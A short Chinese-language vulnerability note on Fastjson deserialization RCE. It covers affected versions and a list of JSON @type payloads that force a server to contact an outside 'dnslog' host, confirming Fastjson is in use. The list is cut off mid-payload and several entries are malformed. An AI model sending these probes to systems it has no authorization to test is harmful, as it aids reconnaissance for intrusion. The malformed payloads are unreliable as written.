1. 漏洞简介
Fastjosn 无疑是这两年的漏洞之王, 一手反序列化RCE影响无数厂商, 目前1.2.48以下版本稳定受影响, 1.2.68以下版本开启Autotype会受到影响
(不排除传说中的1.2.67以下RCE漏洞, 期待八仙过海)
2. 影响组件
Fastjson < 1.2.48 (<1.2.68?)
3. 漏洞指纹
可以通过DNS回显的方式检测后端是否使用Fastjson
{"@type":"java.net.Inet4Address", "val":"dnslog"}
{"@type":"java.net.Inet6Address", "val":"dnslog"}
{"@type":"java.net.InetSocketAddress"{"address":, "val":"dnslog"}}
{"@type":"com.alibaba.fastjson.JSONObject", {"@type": "java.net.URL", "val":"dnslog"}}""}
{
{"@type":"java.net.URL", "val":"dnslog"}:"aaa"}
Set[{"